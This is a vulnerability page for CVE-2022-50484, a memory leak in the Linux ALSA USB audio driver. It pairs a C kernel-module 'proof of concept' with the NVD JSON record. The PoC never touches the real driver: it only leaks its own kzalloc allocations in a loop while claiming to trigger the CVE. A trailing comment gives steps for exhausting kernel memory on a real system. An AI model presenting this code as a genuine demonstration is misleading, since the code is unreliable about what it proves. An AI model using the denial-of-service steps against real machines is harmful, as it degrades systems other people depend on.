CVE-2022-50484

// CVE-2022-50484 PoC - Trigger URB memory leak in ALSA USB Audio driver // This PoC demonstrates how to trigger the memory leak by causing // -ENOMEM during sync endpoint URB allocation #include <linux/module.h> #include <linux/usb.h> #include <linux/slab.h> #include <linux/vmalloc.h> // Simulate the vulnerable allocation pattern from sound/usb/urb.c // In the original vulnerable code, ep->nurbs is set AFTER the loop, // causing partial URBs to leak on allocation failure. struct mock_usb_endpoint { int nurbs; // Number of URBs allocated (stays 0 on failure) void **urbs; // Array of URB pointers int urb_count; // Target URB count }; static int trigger_urb_leak(struct mock_usb_endpoint *ep) { int i; int target = 8; // Target number of URBs to allocate // VULNERABLE: nurbs is NOT set before the loop // ep->nurbs = target; // This line is MISSING in vulnerable code ep->urbs = kzalloc(sizeof(void *) * target, GFP_KERNEL); if (!ep->urbs) return -ENOMEM; for (i = 0; i < target; i++) { ep->urbs[i] = kzalloc(256, GFP_KERNEL); // Simulate URB allocation if (!ep->urbs[i]) { // -ENOMEM hit in middle of loop // ep->nurbs is still 0 here! return -ENOMEM; // Error handler will fail to free urb[0..i-1] } // ep->nurbs = i + 1; // Only set after success in vulnerable code } ep->nurbs = target; return 0; } // Kernel module init to simulate USB audio device hot-plug stress test static int __init cve_2022_50484_poc_init(void) { struct mock_usb_endpoint ep; int ret; int i; pr_info("CVE-2022-50484 PoC: Triggering URB memory leak\n"); // Stress test: repeatedly trigger allocation to exhaust memory for (i = 0; i < 1000; i++) { memset(&ep, 0, sizeof(ep)); ret = trigger_urb_leak(&ep); if (ret == -ENOMEM) { pr_info("Triggered ENOMEM at iteration %d, URBs leaked\n", i); // In vulnerable kernel, ep.urbs[0..partial] are never freed } } return 0; } static void __exit cve_2022_50484_poc_exit(void) { pr_info("CVE-2022-50484 PoC: Module unloaded\n"); } module_init(cve_2022_50484_poc_init); module_exit(cve_2022_50484_poc_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("PoC for CVE-2022-50484 ALSA USB Audio URB memory leak"); MODULE_AUTHOR("Security Analyst"); /* * To trigger this vulnerability on a real system: * 1. Apply memory pressure (e.g., run a memory-intensive workload) * 2. Connect a USB audio device that uses sync endpoints * 3. The driver will attempt to allocate URBs for sync endpoints * 4. Under memory pressure, -ENOMEM may occur mid-allocation * 5. Partially allocated URBs will be leaked * 6. Repeat steps 2-5 to accumulate leaked URBs and exhaust kernel memory */

{"cve": {"id": "CVE-2022-50484", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.210", "lastModified": "2026-01-23T20:05:06.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential memory leaks\n\nWhen the driver hits -ENOMEM at allocating a URB or a buffer, it\naborts and goes to the error path that releases the all previously\nallocated resources. However, when -ENOMEM hits at the middle of the\nsync EP URB allocation loop, the partially allocated URBs might be\nleft without released, because ep->nurbs is still zero at that point.\n\nFix it by setting ep->nurbs at first, so that the error handler loops\nover the full URB list."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5", "versionEndExcluding": "4.9.331", "matchCriteriaId": "A7AFB433-1E52-42CB-9C1B-AA99F92B2F79"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", "matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.220", "matchCriteriaId": "125F7133-B3B7-4175-8CF3-FF0845483254"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0604e5e5537af099ea2f6dfd892afe5c92db8a80", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0672215994e2347a9b4f145e2bc1709b1e01cee3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/28d8d267af5d73f91d7640cbdb4024703256e36c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/46f0aed47673e275d682af60ed26dcc28add8eae", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6382da0828995af87aa8b8bef28cc61aceb4aff3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/988ec0cd0a2643c25c1658f7c33de2e15a5a2e31", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bc1d16d282bca421c6fc31de4b8fd412010f01bd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e4442410f76d66b9f7e854010bce04853f665324", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/faa8c1ed77d0169955b9b3516b714cc5fb512f27", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}